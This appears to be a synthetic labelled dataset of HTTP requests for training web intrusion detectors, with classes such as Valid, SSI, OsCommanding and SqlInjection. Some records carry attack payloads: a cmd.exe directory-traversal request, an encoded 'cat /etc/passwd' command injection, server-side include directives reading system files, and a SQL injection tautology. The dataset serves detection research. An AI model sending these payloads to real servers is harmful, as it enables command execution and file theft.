Warning: 494 13.80.115.26:79 "esgjTrwOnjs" "Wed, 07 Oct 09 24:18:13 UTC"
X-Forwarded-For: 86.231.25.73
X-Serial-Number: 21325127322802331
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24292
Start - Id: 26814
class: Valid
GET /atijens5sttinT/allformanexecZYP3documenti/5nahuqCPB.0Vkidf/9Ao0ionn/n4ltLb/n6xr7/svSeel/irnlraseNni/eniol/iqhcdniu7v.png?ZZD5include=1nn1binIrOan0n&uo8aJmrweataes=yukaot%3EstaE&939WDaGsb=089860773&tDiipT=QLtv4ew&hgNe1aq7shvHh=scf&Fsamk.wJp=%5DheEmAyrexec&aioYa=6721&9StybB=ph&tibCesn=htsBm&Pr95cfaiay8ojse=netcat9od%3E+l3easmitet&rlt=d9tnDtibsa&shsilsgl3matio=808743&Ettidzrt8xeo=ri&afttuetxiiDafa=68&7d85Oscript=Tdhta HTTP/1.1
Host: www.mmho.ch
Connection: close
Accept: application/zip, application/*, video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.0, compress, identity;q=0.7
Accept-Language: *
Cache-Control: max-stale=9270
Client-ip: 176.108.132.189
Cookie: gseeefi=nQkw0r;fS=870752562;atnz=lismyv5\n
Cookie2: $Version="65"
Date: Mon, 12 Dec 05 23:47:20 GMT
ETag: W/"1qXeixpCkvzJassQ"
Expect: cltu=tmss;uuan6=qlkaTsd
From: 4ahee@onawd.st
If-Modified-Since: Wed, 12 May 04 10:09:12 CET
If-Unmodified-Since: Tue, 24 Aug 04 15:50:11 UTC
If-Match: "-5uF7o.RecTuYFUNEQ1z"
If-None-Match: "ypwFR-nV5XLRGmQG"
If-Range: Fri, 24 Mar 06 05:53:20 GMT
Max-Forwards: 4
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 65405-,6-
Referer: /axa2/1mneuRr/ezfib/nlcr.rar
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.5 (Windows; U; Win98 5.9; ui-vl; rv:5.4.2) Gecko/97583067
UA-CPU: StrongARM
UA-Disp: 8290,106,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8583x639
Via: ttrtw/0.5 www.sdramn3.jpeg, 1.6 www.svgm.jpeg:3, 3.2 www.hrl6nd.js
Transfer-Encoding: deflate
Upgrade: opiEo/2.6, i3n5Ve/7.1
Warning: 389 52.49.112.134 "oteheTaa8etaepq0e" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 51104
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 26814
Start - Id: 14259
class: Valid
GET /qao1/xytdum/sPXtsDK/t5W73BQA_5iE96oYf.jpeg? HTTP/1.1
Host: www.sjda.ch
Connection: close
Accept: image/png, text/plain;q=0.6
Accept-Charset: x-mac-ce;q=0.9, iso-8859-6
Accept-Encoding: *;q=0.8
Accept-Language: iqtyh-eigt, ihSae1fs-nhrhao9n
Cache-Control: max-stale
Client-ip: 110.246.2.165
Cookie: idjjGNa_WP9=dH;sPi6=mpCXxdm_S8;exectJL=0Nqvuu;hkEerrtt=dr;twerd=Anit eandect|
Cookie2: $Version="960"
Date: Tue, 21 Nov 06 07:01:11 UTC
ETag: W/"9NYTjtyVsu4-K5pmEI4C"
Expect: 100-continue
From: faeootnr@3EygNeo.st
If-Modified-Since: Tue, 12 Apr 05 22:17:20 GMT
If-Unmodified-Since: Fri, 23 May 08 07:19:38 UTC
If-Match: "tqN08togsBE1frkY"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: jjausT milX=ishr
Authorization: Digest uri=/nvnoeew/potb/4Eagh.txt
Range: -45
Referer: /eel4/8Truvi/ehtl7/nodcCf.wav
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.5 (Machintosh; U; PPC 0.6; 3e-4i; rv:5.5.5) Gecko/02046710
UA-CPU: 68000
UA-Disp: 985,925,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1753x6779
Via: 4.4 224.101.80.46, HTTP/9.9 www.baHubo.jpg, 1.0 218.180.88.4
Transfer-Encoding: gzip
Upgrade: fibea/9.9, zvl/0.8
Warning: 245 www.shn0o.jpg "rrtOe3dbt8i84ttada" "Mon, 10 Aug 09 22:29:45 GMT"
X-Forwarded-For: 252.132.26.90
X-Serial-Number: 4359426
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14259
Start - Id: 40860
class: SSI
GET /ktRfwDezhftela/htembdeu/nlrwunaCiUnhek5/7g8v7epzT/9lopD424.c/rZg@g42G2i9Edd/passwdUTGBYu.jpeg?fnhfq=est2bLtm%40b&hgqejdrpbkfid=pse&tyng=2&tnnahh=Lnnha&itgqnwit=idommo&nte6miEisrec3=%3C%21--+%23odbc+connect%3D%22ehngz%2Cgoe%2Cto2%22++++++statement%3D%22select+++*+from++g68n%22--%3E&esapnnhneUetdrj=aJLm8u7.K1Vp&cEca=j&ednozriWlaa=at%40ntdxwp-%40lh+%28fsiueA&Ag=t1jaV5m%406&vi2f=78956 HTTP/1.1
Host: www.mrve.cz
Connection: close
Accept: text/*, image/jpeg;q=0.5
Accept-Charset: iso-8859-3, hz-gb-2312;q=0.0, windows-1254;q=0.4
Accept-Encoding: *
Accept-Language: ddsw-baieoa, an-lena6e, il2id-db, cIZro-e
Cache-Control: max-stale=2894
Client-ip: 183.188.60.40
Cookie: rsrtiTidim=577762008;GLHx6j6oJti1=krasigTxO4gO;noO5uos=5;n4awsbdtnex4=n?ne;hsino=nsthcNDPEyas;LlCrarechoGQhome=rcpps
Cookie2: $Version="380"
Date: Sun, 07 Dec 08 23:16:42 UTC
ETag: "l8YqCEbciYrBlazH.KJE"
Expect: ahutgh=Zrti
From: ednaAi@brso.de
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Tue, 08 Jun 04 07:31:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 959
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM b2xRbmFjZWVwOW41c28yYWxxZUw3Um1kaXJJdXNvZW5ubHZoZGU2ZG1hZ2ls
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: 662370-,944629-04,749394-
Referer: /btoeb2or/oT8hnuen/aNhO.exe
TE: trailers
Trailer: Date
User-Agent: euecqR96fu
UA-CPU: x86
UA-Disp: 2426,7787,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5993x410
Via: 5.9 203.65.239.214:4
Transfer-Encoding: identity
Upgrade: iTdaap/8.9
Warning: 001 94.18.227.26 "tarnYgrgo4d" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40860
Start - Id: 43544
class: OsCommanding
GET /thahtaldr6tqo7/1EOZkP/u@/2lsolc/x_cwgY.pl?o85RfNdivhtacceslpasswdnodei=%250a++cat++++%250a+%2Fetc%2Fpasswd++++%250a&am9utblnr548jnC=TahFd8ht0hsp HTTP/1.0
Host: www.hsss.uk
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, koi8-r;q=0.5, us-ascii, x-mac-arabic;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: max-stale=96878
Client-ip: 214.70.1.175
Cookie: mtcaktjtsoRnl=ofrom;V@4PxVQ63=aJ_@OzJWwv3d;dd=55
Cookie2: $Version="17"
Date: Thu, 25 Nov 04 20:03:03 GMT
ETag: W/"LAnz5Rj1v.GFfze"
Expect: 100-continue
From: nsaoonaw@rhao6t.cz
If-Modified-Since: Sun, 04 Apr 04 24:32:08 GMT
If-Unmodified-Since: Wed, 04 Apr 07 07:55:26 UTC
If-Match: *
If-None-Match: "r0dID3-BH7rp1H4"
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 34
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Digest algorithm=dceste
Range: 387259-2,9-
Referer: http://gdgqw.org/ienpfisg/iaulr/mbhe.rar
TE: deflate,trailers
Trailer: Expect
User-Agent: 4fasrar5at (xc1h82FyN; n49Vc7Bq; lX_vJ9y3Kj; x@W@de9-)
UA-CPU: x86
UA-Disp: 230,276,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 176x225
Via: HTTP/2.3 www.tUwoq.tiff, ack/0.3 www.aacl.tiff
Transfer-Encoding: compress
Upgrade: tatTmi/7.0
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 166.207.32.118
X-Serial-Number: 431097380
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43544
Start - Id: 10794
class: Valid
GET /2uptislvmc/oASRI/uKyWGPQ56.exe?jiahs=dnt0&t4Tq9rug=s5%25ut4+bodyfff&hs=na&lt3L=l0dZjAFJbRc HTTP/1.0
Host: www.kcaxye.it:80
Connection: cnaop
Accept: text/plain, image/gif, video/mpeg;q=0.7
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.4, identity, identity;q=0.6
Accept-Language: *
Cache-Control: max-age=6478
Client-ip: 210.7.8.147
Cookie: DWae=4O@Sl;L0YIsZtdX5=omb;rpt8d=87407
Cookie2: $Version="9"
Date: Sun, 25 Sep 05 13:43:31 GMT
ETag: "fNmsx9usxqQx6nMj2L4"
Expect: edeosGeb
From: etraE@esntn6w.fr
If-Modified-Since: Tue, 23 May 06 16:41:22 CET
If-Unmodified-Since: Thu, 28 Jan 10 10:17:41 UTC
If-Match: *
If-None-Match: ".3eLlFo2BvDD3zJRc"
If-Range: "5pX0riV0i.EErHO_pwkX"
Max-Forwards: 74
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM YTdqamR6cmFueXkwY29nYWpuN2ViaTVob3JybmRnYWFh
Authorization: kyOrs1 aryrnawo=eEtirrip
Range: 2-
Referer: http://www.swpesT.st/dzg7t/wedr/BttcsrI/zw0c.swf
TE: trailers
Trailer: Warning
User-Agent: Mozilla/7.1 (Windows; U; Win98 5.1; ly-ad; rv:6.5.6) Gecko/69215220
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5414x362
Via: 2.6 www.rm4es.png, HTTP/5.8 www.rrbehoir.tiff
Transfer-Encoding: deflate
Upgrade: dec/3.8
Warning: 774 www.dijag.css "sedtyunrietbnTe" "Sun, 26 Feb 06 01:26:33 CET"
X-Forwarded-For: 228.129.199.161
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10794
Start - Id: 40697
class: SSI
PUT /znY1kwc5/zy/lvBL1Mhq3/bpdaireszfxtluokn7E/osgy6cgrlnarencto/atVs.af8670ZO1fhsi_/dnn/onhs0ejeW/6b5uybtouGcec9u.htm? HTTP/1.1
Content-Length: 272
Content-Language: sLatmu
Content-Encoding: deflate
Content-Location: http://rxyxhJah.be/ns9neSa.ace
Content-MD5: MXV0aXJxaWNsbnJybHNvcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Dec 06 03:35:57 CET
Last-Modified: Wed, 27 Feb 08 06:31:43 GMT
Host: 233.5.182.153
Connection: Aeoeea
Accept: application/rtf;q=0.0, text/*;q=0.7
Accept-Charset: iso-8859-4, x-mac-ce;q=0.7, gb2312;q=0.1, windows-1254;q=0.4
Accept-Encoding: <!--#include  virtual="c:\winnt\system.ini" -->
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 214.235.151.225
Cookie: passwdE9home8DMhANO3=bineos
Date: Fri, 20 Aug 04 16:02:50 CET
ETag: W/"teShDpm_5w_wd8KX93z"
Expect: 100-continue
If-Modified-Since: Mon, 08 Oct 07 20:33:24 UTC
If-Unmodified-Since: Sun, 10 Jun 07 01:13:29 CET
If-Match: "bOp@3cMF1bE.sJ1Xz0"
If-None-Match: "V0fH8r-dAZa14mr"
If-Range: Wed, 17 Feb 10 14:20:50 GMT
Max-Forwards: 9
Pragma: eie='oarxssaE'
Proxy-Authorization: bebO Mearduc=urhhaktn
Authorization: siFt eCroun=eehnuh
Range: 25037-
Referer: http://www.rfE1.st/nntI0h4.js
TE: trailers,chunked;q=0.6
Trailer: Warning
User-Agent: Mozilla/6.0 (X11; U; Linux i586 2.7; nW-D3; rv:0.1.0) Gecko/08111787
UA-Color: color32
UA-Pixels: 710x9226
Via: HTTP/3.5 16.217.127.247, 5.4 www.skreki.htm:6017, HTTP/0.1 9.200.124.189
Transfer-Encoding: gzip
Upgrade: ueebsr/9.1, ne2o7d/1.3
Warning: 668 162.254.116.220 "plSi7RsiGdoLxioTh" "Fri, 12 Oct 07 18:20:25 GMT"
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

raeef8teTkxmi=694188847&DiNfmiicg=d.0&Hzexsoese3i=6&ti=0EKZefVfl&ol=divnrnthe(d3sa&R9zXlogSYW=a$Ttincludeste;&ol3jzoDdn=o9n3rtn&Ldrhp=07351&TeA6ttHebA0t=gU7UQWdCdlFd&atlsswyaoew=oei4abdelete]l  n&lx4h49bartav=473&SorNhR8dkMM=lqceGs%&tevtmarn9adOe0=4441818&1art=n

End - Id: 40697
Start - Id: 1272
class: Valid
GET /iEe/7meW/eaente/nutnBnaTPRgdcor6en/uHtrh/cEFPNX72Eei.cfm?bnlxsn=59467465&execN5rmpmojbn=lmpmbxh&tixelroer9=ow&duuPaetbrb=5 HTTP/1.0
Host: www.dsea9m.it:5770
Connection: nir71Tt
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=24056
Client-ip: 32.114.105.164
Cookie: acpAeriemqRT=ulee8tmgy( s;yrr(i|;M0vbscriptallMKXC2AR=afjcGBx
Cookie2: $Version="1"
Date: Wed, 06 Aug 08 16:48:45 CET
ETag: W/"o8S5Ip9-f7FwSEWF"
Expect: 100-continue
From: o2yoIi@nrSybWihss.biz
If-Modified-Since: Sat, 07 Jun 08 06:33:17 UTC
If-Unmodified-Since: Tue, 04 Jan 05 09:52:14 UTC
If-Match: "6GSaloYdqZuvVj0z"
If-None-Match: *
If-Range: *
Max-Forwards: 954
MIME-Version: 2.1
Pragma: ni='e'
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: Basic cjMzaDpTOW5pdHV0aw==
Range: 877225-,5968-55715
Referer: /1ewem/6ohxei/5Soonrlo/cEtor8r5.rar
TE: gzip
Trailer: If-Match
User-Agent: 0e3ngnfb (w8qt6H; dqQ5bev; 4LBf31xNf; udbIGVcZfY)
UA-CPU: Sparc
UA-Disp: 7057,1864,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7486x696
Via: 6.1 www.mr1ua.jpg, 8.2 www.b9jXel.htm, 0.4 www.eeno.gif
Transfer-Encoding: gzip
Upgrade: mtc/2.4, 2tb/3.3, uMmd0b/9.5, oua/7.8, sdtbe/1.8
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 637706469281723
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1272
Start - Id: 7488
class: Valid
POST /KQgxcOrQbgsoundKRD39/iPjeQ@/iwaleetso/yPmwVQpn/euXg6Ot2DDM1L4D7X-9/qGEyAVpasswdx3rCMlyE/xn/iiDxrt.jsp? HTTP/1.0
Content-Length: 55
Content-Language: icf
Content-Encoding: identity
Content-Location: /durs/iNse.jsp
Content-MD5: ZmNpYWltdXRsaFNlZDdlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Jan 08 10:38:40 CET
Last-Modified: Wed, 16 Nov 05 05:32:07 GMT
Host: 83.179.79.91:80
Connection: close
Accept: application/rtf, application/zip
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip;q=0.4, deflate, deflate;q=0.4, identity;q=0.1
Accept-Language: *
Cache-Control: supenj='Goqaiiec'
Client-ip: 39.73.50.152
Cookie: i0eq2oAhh=o5sfprYy;aabnhnq=w7ij;4IE9b=2908;beqptpMenuesHe=delm;hatitfsR0=05;mmrMhndiczawieA=8458367815
Cookie2: $Version="4"
Date: Fri, 21 Sep 07 18:55:46 CET
ETag: "jxkAaZXV9ft_EKIpIN"
Expect: 100-continue
From: nx7o@olnt1.uk
If-Modified-Since: Sun, 16 Jan 05 10:47:31 CET
If-Unmodified-Since: Fri, 21 May 04 04:37:28 GMT
If-Match: *
If-None-Match: "RUKEdwKAURMzpmX2f-"
If-Range: Thu, 16 Sep 04 01:00:29 CET
Max-Forwards: 65
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic bWFnZXRjOnVlYnVv
Authorization: eawe ryehtr4=IuesrItn
Range: 8-,73-,-165528
Referer: http://www.ro9a.ch/taRla.sh
TE: trailers,chunked;q=0.5,trailers
Trailer: Pragma
User-Agent: Mozilla/3.7 (X11; U; Unix 8.3; Ms-mo; rv:7.8.8) Gecko/42496328
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9362x280
Via: 7.6 109.79.24.139, 3.6 www.naiuON.htm
Transfer-Encoding: seleo
Upgrade: P8noxB/7.2, Eotn/1.5, emG3o/2.1, sw5ei/5.4
Warning: 455 104.216.159.217 "0Ee2rsw" "Mon, 10 Jan 05 17:05:47 CET"
X-Forwarded-For: 192.154.138.206
X-Serial-Number: 527443957
----: ------------------------
~~~~~: ~~~~~~~~~~~

anFPH9Y8Y2=1584&amactipft6err=e7FMWf6&igzo=iaf3aAftpenh

End - Id: 7488
Start - Id: 9248
class: Valid
GET /5qacceptbgsound9gTsNjm/yFgs2waF/judolg4wsE7c/nHwvLV7k50/Ds4ew9e/1N.swf?ndytnh2nShn=7%252&rengshr0abts=er+se&olOs6mdrml=705246202&owanssn7Noeto1e=badapa%26SasRlnr&alioin=8093391&sl=rYKNk&nUctoR=mRrrt7Dk HTTP/1.1
Host: 139.171.236.207:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-7, windows-1258, iso-2022-kr, iso-8859-1;q=0.3
Accept-Encoding: compress, compress, compress;q=0.4, identity;q=0.2
Accept-Language: j-k
Cache-Control: zOietahj=eeilbg
Client-ip: 253.111.158.204
Cookie: 6slremf=9423;nmlntt3HtDsfi=3918007;ujlhonit==msr
Cookie2: $Version="776"
Date: Wed, 10 Feb 10 08:21:20 UTC
ETag: "lC2c3zVTXTW@QzaDI"
Expect: 100-continue
From: odmn5jk@dalmleb.ch
If-Modified-Since: Sun, 11 Nov 07 06:00:48 CET
If-Unmodified-Since: Wed, 10 Feb 10 03:57:54 UTC
If-Match: "qHF3GXO3u@20RzmxXizt"
If-None-Match: "N7wabIvxzgncGyG97n"
If-Range: *
Max-Forwards: 059
MIME-Version: 8.5
Pragma: aja=wioner
Proxy-Authorization: NTLM ZWlNc2xhWmYxRTJ0ZXJ5T25zeUVvc3RsaTZxcnJobjg2b2lnZWty
Authorization: NTLM cnN0c2VzcWhuc2VOdGRzaGFpZm95ZnJpb2ZmbW1OYWZhZW5pMHR0RXducEhvYWoz
Range: 30-703,-64,-521
Referer: /85es/77ll6iE/ettrr/geonud.bin
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: eeuRfoorl/7.0.2
UA-CPU: Sparc
UA-Disp: 2373,285,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 476x394
Via: 4.1 www.dynmvn0m.js:9921
Transfer-Encoding: identity
Upgrade: dOaas/3.7
Warning: 098 www.iriniet.jpg "gTtClrnalaet7hOahf4" 
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 1183093668274031792
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 9248
Start - Id: 35211
class: SqlInjection
GET /ffwesbOdeY4scgCI/ore/tdZtWvGVNjYC/j7AlWX8kjBjx/otamce6raEe/Gbvzz7A.msf?c4=OR++%27eesu%27++++%3D+++++%27Sim%27%2B%27ple%27&r7ageInxtpeH=3yTu HTTP/1.0
Host: 151.89.237.0:53
Connection: keep-alive
Accept: image/jpeg;q=0.5
Accept-Charset: x-mac-turkish;q=0.4
Accept-Encoding: 
Accept-Language: etshl-c;q=0.9
Cache-Control: no-cache
Client-ip: 247.223.116.97
Cookie: syebryfS2eyesl=5686346825;geeiu=gi;mitodppiasxi2f=it9pMzevn2hsiodfy1;nne=841811
Cookie2: $Version="8"
Date: Sun, 09 Aug 09 13:04:18 GMT
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: duapjRis=awoeo;l1m7=3t6n
From: ohztf@hhetact.fr
If-Modified-Since: Mon, 14 Dec 09 22:24:31 CET
If-Unmodified-Since: Mon, 21 Dec 09 01:11:12 CET
If-Match: "_LaY3b0Sp0D@khE-OU"
If-None-Match: "P0A0DIGT3amurqGmRtiB"
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 607
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic RmVacGU6cmFzQQ==
Authorization: oaihl AEnmn=htiils
Range: -30216,36258-
Referer: /itsc/w3aheh/es5a7mns.asmx
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/3.0 (X11; U; Open BSD i586 6.2; fu-qF; rv:9.6.9) Gecko/41357181
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: deflate
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35211
Start - Id: 630
class: Valid
GET /4sW7/n7upYU@AW1n/sYrrpietri/gu95HOibwi7deusA/hD2pkX633fOLfXqE.cgi?Sgn4min=46&XhiRV=0209&emxtlenO=73 HTTP/1.0
Host: www.lFoit.be
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, x-mac-korean;q=0.0, x-mac-greek;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: oT5-seli;q=0.9, boieM-t;q=0.0, 9fsatu-pfeh;q=0.3, l-gmojt;q=0.4
Cache-Control: no-store
Client-ip: 196.106.7.43
Cookie: ri=atUslgaahwn9No;wbuoeGiwu7Nss=nreplaceao;0oWjcatr-=nsilem6redneg;r1t7N=a ;-TAiaqD-=750
Cookie2: $Version="12"
Date: Thu, 29 Mar 07 09:23:40 GMT
ETag: "t3_R8tNZtPZMq@5@O"
Expect: owRwMo
From: ystebe@hnBteRt6v.be
If-Modified-Since: Wed, 21 Apr 10 15:33:04 GMT
If-Unmodified-Since: Tue, 02 Jan 07 13:32:57 GMT
If-Match: *
If-None-Match: *
If-Range: "W_4298vCsrO8.W@pE"
Max-Forwards: 2
MIME-Version: 1.8
Pragma: c5ou=3vjec
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: NTLM YmFrRGFlbnM0VEFldGhlaXRyaGFidHB0bm9leWVvNGZPMXg0ZGMzaDdhZHNlVA==
Range: 0-,76-659886
Referer: /atwqe/aiz8/mpom9/Oeaasg.txt
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: TE
User-Agent: s4doneer3f (hLkCL2-seZ; ucvzY.O; rbU@9Ra; etGslY)
UA-CPU: x86
UA-Disp: 2226,321,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1676x432
Via: 6.8 189.94.218.139, 9.2 www.utoEls.png:32
Transfer-Encoding: compress
Upgrade: las/2.0, lc8/2.6, oys/5.1
Warning: 148 www.lgd73e.png "ictnerAenruNu" 
X-Forwarded-For: 61.182.37.41
X-Serial-Number: 541499677250739
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 630
Start - Id: 16974
class: Valid
GET /pW3VYnbVHgqi0c-xC/3XinserthX1/iF7xnhNTUJt/nmc9slabex5es/Ew8meta19RadminxQ/rtehv6e/nctfaasypavt1mer/m0on/ass/o9eews/nula82s/o.Iw4asT79pWQD.jpeg?8mRSbaqrhrdgys=sj2q&1d7ts1nulutnna=Hivbscript8ateeh&qnsgod94cey3saE=oEwenWaNssaschMek&9MJdXPh7O=8494797&ES7JEoptwKC5q3=ebeusei3&f2KAPejXt=Iiaxt&iEt3es8pd9uoU=592505475&Aat1hTteHrc=Mlotiatae&eiurrss8ireecp=aips%5D&eewh3t=dopxml%5D+sfj5%25 HTTP/1.1
Host: www.roua.st:179
Connection: sndn
Accept: */*
Accept-Charset: iso-8859-9;q=0.9, windows-1251, x-mac-chinesetrad
Accept-Encoding: identity;q=0.2, compress, deflate
Accept-Language: e2uhj-h8vd6;q=0.7
Cache-Control: min-fresh=3
Client-ip: 179.207.248.26
Cookie: dsdsnoqht=pysP5hi;SltiSsyiuhiciha=xp_@;nie=92lpeemaews04Qdry
Cookie2: $Version="72"
Date: Wed, 06 Jan 10 24:58:36 CET
ETag: W/"6MVZgxkfq4-a0wCQJq96"
Expect: 100-continue
From: tilh7o8@rkyx6lf.net
If-Modified-Since: Wed, 01 Nov 06 12:32:32 GMT
If-Unmodified-Since: Sat, 07 Nov 09 19:49:51 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5512
MIME-Version: 9.9
Pragma: ote='ndtouf'
Proxy-Authorization: Digest uri=http://www.tajkhset.st/gasMoui/toyh/lii7/qoo0p4S/taaetS.msf
Authorization: Digest username="Sncawdw"
Range: 24-,91-66
Referer: http://www.1derkjE.com/tnwiie/iaeal.conf
TE: chunked;q=0.2,chunked;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/7.7 (compatible; MSIE 1.3; Win98; twoswigman; ThteAeee; 4irnu)
UA-CPU: 68000
UA-Disp: 7477,718,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 366x7717
Via: FTP/7.9 www.qtIs1caE.gif:8654, 9.9 www.iatnnHl.jpeg, 6.0 209.191.34.235
Transfer-Encoding: identity
Upgrade: hole/5.0, ius/3.3, iejL/8.0
Warning: 236 www.kteDei.png "aaNzovzy59eaipao" 
X-Forwarded-For: 74.191.166.32
X-Serial-Number: 44944819
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16974
Start - Id: 36503
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 252.12.183.221
Connection: rite
Accept: */*
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=915
Client-ip: 71.53.140.2
Cookie: sraTrqsCeui=5;dli=itsbeannteu29w
Cookie2: $Version="6"
Date: Mon, 06 Nov 06 03:03:59 CET
ETag: "PbL-0SjZXzb3X6N9tt"
Expect: atcEeo
From: gshio@xxma.be
If-Modified-Since: Tue, 25 Sep 07 21:25:41 GMT
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "lMqOAnisi3zsqiE"
If-None-Match: "Vn_sx9R.4PJ5Hed"
If-Range: Wed, 04 Jan 06 11:04:38 UTC
Max-Forwards: 9509
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: osnreg sghsw=aqOrAfHc
Range: 998505-,-0540,815-
Referer: http://www.IswEe.st/6Eoi5kl/aneSmntl/neehmy7/rtear1r/siathI.fgf
TE: trailers,trailers,chunked;q=0.5
Trailer: From
User-Agent: b8-jQ7H http://www.otsnzca.be
UA-CPU: MIPS
UA-Disp: 5117,829,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/9.2 193.240.86.205:954, 3.8 www.lettoAsn.png
Transfer-Encoding: gzip
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36503
Start - Id: 12001
class: Valid
GET /gegshotdojEe0nytcso/antliiIocrEntJqfi/Ftlndllxtrlr37orhph2/exJ/oT5c7vFk/A5GY.png?gtcaFsrateze2=%3Aescriptno HTTP/1.1
Host: 255.158.131.29:7460
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: B7=2
Client-ip: 194.126.172.31
Cookie: ee5=>4rzd a4iselectp ;nhrd=>ox@oj2aeCleS;tae;_dm0l2i9HbinD=e.57V9dOD9
